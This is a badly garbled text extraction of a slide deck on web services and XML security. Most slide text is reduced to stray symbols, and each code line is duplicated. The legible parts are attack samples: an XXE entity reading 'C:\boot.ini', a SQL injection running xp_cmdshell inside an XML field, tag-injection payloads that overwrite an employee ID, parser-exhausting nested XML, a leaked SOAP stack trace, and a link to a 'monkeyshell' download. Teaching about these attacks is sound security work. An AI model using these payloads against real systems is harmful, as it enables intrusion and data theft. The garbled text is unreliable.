
Web Services

					        ! "
   #
$ %&%
'
(
$ %&%         )

* '

* +# ,

* -. /                ! ")             (
                                     0 ( 1 -&   +#
  )  /                    2 #     1 -. / $    $    /
          1       %

*      /   34 #                           -   5
        ( %
    3. / 6 & 3        5               (        (   7
    8    %                8   9

*     #           6       )

* &               /       #               :
  %
)

! ")               4#    5 %

 58
< &        2
           =        79         >

           2

           9

! "    #       &

           ! "     #




                                   ;
! ")             4#   5 %
* 6%    )

* ) %       4#

* )         4#




                            ?
6%              )
* !%        6%      )       @

* 6%        )           %                    %
        #       %                   #

    "

* (             %                   %    A       %       %
        %       B                       %
                    "

*                               %                    %
                                                     %       #




                                                                 :
! ") %                   4#
*       4#       C       %   % %   %       %
    %

* 5          %       %        %



* ) %        4#      #   %             D
    %
! ")                                                4#
*   ! "                                        #                   %
                      "
                      /                                                 #

*   +         %               "        /        "                  #
          %                           F

    ,         #               G            % (           G         #
                                           %

                          #       G                  %         %        /
        % (                                            %           /"
         # #              "               6
                                          =%          # #
          /                                         %%         >

    ;   (             H %                 GH         "                       %
                      " "                   %        "                      6%
                                      %                      %
          "       %                            % (            -H
                                                              =     5       1>




                                                                                 E
! ")                                      4#
 ?                   G4#          %                 /           %
                                 % G

 :   ) %                             G     #            %
       %                                  %     %

     )    /        ) %               G)             "   G       "
         %                   %

 E             7     / 5                   G)
                     #           "                              /

 I   (     9             )       /G (      #
           #                                        $
     #                                                  #           /

 J   ) %            4#       G2                     %       #
       %                      %




                                                                        I
)

! ")               4#    5 %

 58
< &         2
            =           79     >

           2

           9

! "    #       &

           ! "     #




                                   J
<58
*
                                        <?xml version='1.0'?>
    <58                                  <?xml version='1.0'?>
                                             <NAME>
                                              <NAME>
    0 $   7         =               >           <FIRSTNAME>Nish</FIRSTNAME>
                                                 <FIRSTNAME>Nish</FIRSTNAME>
    0 ) "    =      "           >               </MIDDLENAME>
                                                 </MIDDLENAME>
                                             </NAME>
    0   ) )= %
         6                  >                 </NAME>
                                             <!-- NAME, FIRSTNAME, etc are Nodes
                                              <!-- NAME, FIRSTNAME, etc are Nodes
    0                                         -->
                                               -->

                                            <NAME TYPE=“LASTNAME”>Bhalla</LASTNAME>
                                             <NAME TYPE=“LASTNAME”>Bhalla</LASTNAME>

* 6       % "          %K@
  /         2                           <?xml version='1.0'?>
                                         <?xml version='1.0'?>
                                        <!DOCTYPE SIMPLE
  (                                      <!DOCTYPE SIMPLE
                                            [[
                                                  <!ELEMENT NAME ANY>
                                                   <!ELEMENT NAME ANY>
                                                  <!ELEMENT MyName "NishBhalla">
* L        0                                       <!ELEMENT MyName "NishBhalla">
                                            ]]
    0 .         (       K               >>
               %   "                    <name>
                                         <name>
      %         7"      %                   &MyName;
                                             &MyName;
                                        </name>
                                         </name>




                                                                                    ,
 58
< &                 G 2               79
   58
* < 2
  2        %        %            58
                                < 7               %       7               %
       "
                       58
                    5 < =        #        >   $ 6'            /

     5 8
  G + M                                                   !;          N
     <
  G ) M#       "            N


* !%       <58                  (     '             F             %
                        #       %             9


   58
* < 9
  9             %                             % %       % <58
               %




                                                                          ,,
 58
< 9
   58
* < 9                           %               %
     #      6%              %       %           #

  0   6 =               6               >
      * $


  0 <     <
          = 58      %               >
      * H       #


  0             #                )
                                O= G        >
      *     #       "   #




                                                    ,
)

! ")               4#    5 %

 58
< &        2
           =        79         >

           2

           9

! "    #       &

           ! "     #




                                   ,;
                      2                  0      5
                                               + &
* 8       2
* 4        # 2



 <?xml version='1.0'?>
  <?xml version='1.0'?>
 <Employee>
  <Employee>
           <name>Nish Bhalla</name>
            <name>Nish Bhalla</name>
  <name>Nish Bhalla</name>
   <name>Nish Bhalla</name>
  <name>Nish Bhalla</name>
   <name>Nish Bhalla</name>
  <name>Nish Bhalla</name>
   <name>Nish Bhalla</name>
   ...
    ...
 </Employee>
  </Employee>


 <?xml version='1.0'?>
  <?xml version='1.0'?>
 <Employee>
  <Employee>
           <name>
            <name>
                     <name>
                      <name>
                               <name>
                                <name>
                                         <name> ...
                                          <name> ...
 </Employee>
  </Employee>




                                                       ,?
                     2                 0        <
                                               ) &
   58
* < (F             @.

 <?xml version='1.0'?>
  <?xml version='1.0'?>
 <Employee>
  <Employee>
           <EmployeeID>2208</EmployeeID>
            <EmployeeID>2208</EmployeeID>
           <Firstname>Nish</Firstname>
            <Firstname>Nish</Firstname>
           <Lastname>Bhalla</Lastname>
            <Lastname>Bhalla</Lastname>
 </Employee>
  </Employee>




 <?xml version='1.0'?>
  <?xml version='1.0'?>
 <Employee>
  <Employee>
           <EmployeeID>2208</EmployeeID>
            <EmployeeID>2208</EmployeeID>
           <Firstname>Nish</Firstname>
            <Firstname>Nish</Firstname>
           <EmployeeID>666</EmployeeID> <!-- SAX Parser sees the id is 666 -->
            <EmployeeID>666</EmployeeID> <!-- SAX Parser sees the id is 666 -->
           <Firstname>Lord</Firstname> <!-- on this attack -->
            <Firstname>Lord</Firstname> <!-- on this attack -->
           <Lastname>Bhalla</Lastname>
            <Lastname>Bhalla</Lastname>
 </Employee>
  </Employee>




                                                                                  ,:
)

! ")               4#    5 %

 58
< &        2
           =        79         >

           2

           9

! "    #       &

           ! "     #




                                   ,
                    6                         =6 >
                             <?xml version='1.0'?>
*   6                   %     <?xml version='1.0'?>
                             <!-- Employee.DTD Resides on server-->
    % <58               "     <!-- Employee.DTD Resides on server-->
                             <!DOCTYPE EMPLOYEE
                              <!DOCTYPE EMPLOYEE
                                 [[
     " %                               <!ELEMENT EMPLOYEE(NAME)>
                                        <!ELEMENT EMPLOYEE(NAME)>
                                       <!ELEMENT NAME ANY>
                                        <!ELEMENT NAME ANY>
                                 ]]
*                            >>

    6% 6    "           %
    % <58                    <?xml version='1.0'?>
                              <?xml version='1.0'?>
                    %        <!DOCTYPE employee SYSTEM "employee.dtd">
                              <!DOCTYPE employee SYSTEM "employee.dtd">
                             <Employee>
                              <Employee>
                                 <name>Nish Bhalla</name>
                                  <name>Nish Bhalla</name>
                             </Employee>
                              </Employee>


*      !                    6%   6        "
                %                               %

*                   !                    6                      " %




                                                                          ,E
                          6 4
* 5            %        A   "                    %   #
         /     6        % <58

* 6%                                                 A
              %     6                                    % "


<!DOCTYPE Employee
 <!DOCTYPE Employee
[[        <!ELEMENT EMPLOYEE(NAME)>
           <!ELEMENT EMPLOYEE(NAME)>
          <!ELEMENT NAME ANY>
           <!ELEMENT NAME ANY>
          <!ENTITY name SYSTEM "C:\boot.ini">
           <!ENTITY name SYSTEM "C:\boot.ini">
]]
>>
<EMPLOYEE>
 <EMPLOYEE>
          <NAME>Nish Bhalla</NAME>
           <NAME>Nish Bhalla</NAME>
</EMPLOYEE>
 </EMPLOYEE>
<EMPLOYEE>
 <EMPLOYEE>
          <NAME> &Something;</NAME>
           <NAME> &Something;</NAME>
</EMPLOYEE>
 </EMPLOYEE>




                                                               ,I
                              6 4
*       6                              % <58              "
                                           "


    )                    "
     )                     "
    KP$ 6 6
     KP$( Q
       66 Q       Q 6 5 - - R"         1S
         (        Q65        R"         1S

    )
     )
    KP$ 6 6
     KP$( Q
       66 Q       Q 6 5 -- 77 77 77 77   77         1S
         (        Q65                                1S

    )       %      "
     )      %      "
       66 Q
        (Q
    KP$ 6 6       Q 6 5 -%      77            1S
     KP$ (        Q 6 5 -%       77            1S

    ))        "
              "       ""
     KP$( Q
       66 Q
    KP$ 6 6
         (        Q 6 5 -%
                  Q 6 5 -%      77
                                 77                   1S
                                                       1S

    "
    "                             ##                          $
                                                              $




                                                                  ,J
< 8&
*   < 8=         "            G %   8            >

*   6%                        <58

    0 % &    6
             =                  >   # #
      <58            7

         '( <
    0 % & ) = 8'                   "
                                  + F >     "              %         %
      M                            G'
                                < 8 +F < 8N

    0 %      <           "      %       #         2
                                                 )(             %
           <58   %

*   <58                         %     G      %             G             %
             % <58

    K@ G     %           T-     7   1 % T-           1@S


    6%           % <58                                         <86
          % <58 *                            +
                                  <
     * <              #           "      %                 /                 %      "

             0 (      9
                 *                               ,     -     .
                                                  ,    -      .
                                                 K@        T-, 1 1   T-:       S
                                                                             1@ S
                     8
                 * L (F                           K@        T-,       T-:     1@
                 * (   4#                              .
                                                       .
                                                 K@        T-, 1 1   T-G:      S
                                                                             1@ S
                                                  K@        T-,       T-G:    1@

                                                           )
                                                           )

                                                 K@        T-, 1     T- :1@S
                                                  K@        T-, 1     T- :1@S

"                                                 /& 0
"                                                  /& 0

KK     T-
        T-      1S
                 1S                              <?xml version='1.0'?>
                                                  <?xml version='1.0'?>
                                                 <Employee>
                                                  <Employee>
 K@ #
K@                   S
               T3, 3@ S
      #         T3, 3@                                <name>Nish Bhalla’; exec
                                                       <name>Nish Bhalla’; exec
   K            S                                   master..xp_cmdshell ‘ipconfig’;--
    K            S                                    master..xp_cmdshell ‘ipconfig’;--
               ) 5 SF#
                 5
             K$ ) SF#                 >BK7$5 S
                                      =>B ) 5S
              K$                       =K7$ )        </name>
                                                      </name>
    K7           S
     K7           S                              </Employee>
                                                  </Employee>
K7   S
 K7    S

K             T3U         3          )
                                  T3$ 5 3S
 K             T3U            3       )
                                   T3$ 5 3S

                                                                                        ,
 26
< ) . (F
* <58                      %    "      "

   2
* < %                      #                   (          "
     #                     <58                % " %< 86
  <2

* 2 %
  0       "        58
                % < 2 %
  0   %           %   %
  0   %          A
* '
  0       "     %
* 2
  0 (         %        %    %

 K                   %     8Q
                      T3 52 +   $ 5  $ V
                                M ) TV %N3S

              PATH                            Filter
 26
< ) . (F
*        26
        <).

*        7W7$

*        7$     7X6

*        7$     M7         Q 1N
                       T -< Y

*        7$     M7    S,     N

   4
* + 5            26
              % <).

*        7$     M7    S,           T,
                                  , N




                                        ;
)

! ")               4#    5 %

 58
< &        2
           =        79         >

           2

           9

! "    #       &

           ! "     #




                                   ?
! "         #        &
* ! "   #       "
                             <?xml version='1.0' ?>
                                <?xml version='1.0' ?>
  %                          <SOAP-ENV:Envelope
                                <SOAP-ENV:Envelope
                             xmlns:SOAP-ENV="http://s.xmlsoap.org/soap/envelope/">
  0 <58                         xmlns:SOAP-ENV="http://s.xmlsoap.org/soap/envelope/">
                             <SOAP-ENV:Body>
                                <SOAP-ENV:Body>
      )
  0 + 2                      ..
                                ..
                             </SOAP-ENV:Body>
  0 ! 8                         </SOAP-ENV:Body>
                             </SOAP-ENV:Envelope>
                                </SOAP-ENV:Envelope>
  0 +       C   (


* 6%        %
   %        #
                             <schema targetNamespace="http://e.com/quote.xsd"
                              <schema targetNamespace="http://e.com/quote.xsd"
                                     xmlns="http://www.w3.org/2000/XMLSchema">
   %                     "            xmlns="http://www.w3.org/2000/XMLSchema">
                                   <element name="TradePriceRequest">
                                    <element name="TradePriceRequest">
   #                                 <complexType>
                                      <complexType>
                                        <all>
                                         <all>
                                          <element name="tiSym" type="string"/>
                                            <element name="tiSym" type="string"/>
                                        </all>
* ! "  #            42                   </all>
                                     </complexType>
                                      </complexType>
  "                                </element>
                                    </element>
    % " /




                                                                                        :
)

! ")               4#    5 %

 58
< &        2
           =        79         >

           2

           9

! "    #       &

           ! "     #
! "                #           G
*     %            +!) 26 2, 9
                         +                  "           ! "   #   @
    , C#      (
      & / )
    ; & / ) %                          5
    ?                      <
                           =   >'
    : &   +#
      (F    '
    E (         .
    I (
    J         #
    , (                        5
    0 1

*          %#
    0 1
       *   2           /        58
                               < (F           26
                                           / < ) . (F


*         "    #                   %
    0 1
       *    58 2
           < G4        /
       *   5 G




                                                                      E
! "                  #            0
* 4              2"           ! "      #
  0                   %           %C   ( %     "       #       "       %"


* C                  2"                    ! "     #
  0 H           +
                =                      %           %       >
       * !      8
               0 (
               0     6
               0 &        (
       *   '         !        8
       *   (         -7       1
       *   (
       *   (


* @!       8     /                             #                   D   %
                     "                     #   #




                                                                            I
C     (0       %             P
* 4        %        "   #

  &
* (5 5         )2       $6
                         6       % ?C   (&   4
      #    "

   %
* 6 C     (&       4        %   "            ,
  Z




                                                 J
! "           #        0            5
 <?xml version="1.0" encoding="utf-8" ?>
- <soap:Envelope
   xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
- <soap:Body>
- <soap:Fault>
  <faultcode>soap:Client</faultcode>
  <faultstring>System.Web.Services.Protocols.SoapException:
   Server did not recognize the value of HTTP Header SOAPAction: .
   at
   System.Web.Services.Protocols.Soap11ServerProtocolHelper.RouteR
   equest() at
   System.Web.Services.Protocols.SoapServerProtocol.Initialize()
   at
   System.Web.Services.Protocols.ServerProtocolFactory.Create(Type
   type, HttpContext context, HttpRequest request, HttpResponse
   response, Boolean& abortProcessing)</faultstring>
  <detail />
  </soap:Fault>
  </soap:Body>
  </soap:Envelope>


                                                               ;
 58 2
< G4
* 5    /  %             "      /
        < G4
       = 58 2 >                           %    %%
   %

* (                                3 %   %#     3
  %     %   62                           <58
         62
       %. 6

http://www.sharp-deas.net/download/monkeyshell.tar.gz




                                                        ;,
         ! "                         #                 G
         *                      %           % "                    @@@@@@@
                                                                  @@@@@@@


                   • WS-Trust                   • WS-Addressing            • WS-Inspection               • Java WSDP   • AXIS
• XML
                   • WS-Security                • WS-Eventing              •WS-Secure Conversation       • Java-WS     • EBXML
• WSDL
                   • WS-Federation              • WS-Topics                • WS-Provisioning             • JAX-RPC     • RPC
• SOAP
                   • WS-Polling                 • WS-Security Policy       • WS-Distributed Management   • JAXR        • DOC
• UDDI
                   • WS-Atomic Transactions     • WS-Resource Properties   • WS-Transfer                 • JAXP        • DOM
• WSS
                   • WS-Business Activity       • WS-Resource Lifetime     • WS-Enumeration              • JAXB        • XSLFO
• WS-I
                   • WS-Coordination            • WS-Reliable Messaging    • WS-Eventing                 • SAAJ        • XQuery
•XPath
                   • WS-Manageability           • WS-Policy Framework      • WS-Enhancements             • XWSS        • WSCI
• XOP
                   • WS-Brokered Notification   • WS-Policy Attachments    • BPEL4WS                     • JAX-WSA     • WSDM
• XML-Encryption
                   • WS-Base Notification       • WS-Policy Assertion      • WSXL                        • OASIS       • MTOM
• XML-Signature
                   • WS-Attachments                                        • WSRP                        • SAML        • RAMP
• SOA
                                                                                                         • XACML       • BICS
• DISCO




    * )                  ! G                               @



                                                                                                                                  ;
*    %                           % @

    0     2         2
    0 5 #  < 8"                  6
    0 2        )<            "         #
       %
    0 6 / "   ! G       M8       "         %
      ! G    N
       58
    0 < G
       58
    0 < G
    0 5   %                  %         /




                                               ;;
)                 #
* !       #       )




              "



      2




                      ;?
                                    2
* +               %#        #               '
                                            =         :   >
   [                                    F
* ! %#        /          F                                        '

* ! %#        G %                   "             #
            " /
  0   . /         ! ")
  0   . /$    $   /
  0   &   +#    )   /                       2 #
  0   !      2
            < 2
  0   !         6
* ! %#

  0 4#                              : 5           B
       ( %
    . / 6 &    : 5              B( V(
      8 9   $Q 6                 B ($        B            B
    6    B  '
* !                     "                             F
  0    %    + !) 26      2              +!) 26                "       Q)   2
      2 F   8
            =   " ) $     <     >


                                                                           ;:
         (
* $ %% &%

 '
 $ %&%   $ X
         = %                       >
 6     +      ?E E   ?II;
  %   "   $  Z        ,;J   J,JI




                                       ;

				
DOCUMENT INFO
Tags: security
posted:4/22/2010
language:English
pages:36
burmesepentester burmesepentester YGN Ethical Hacker http://yehg.net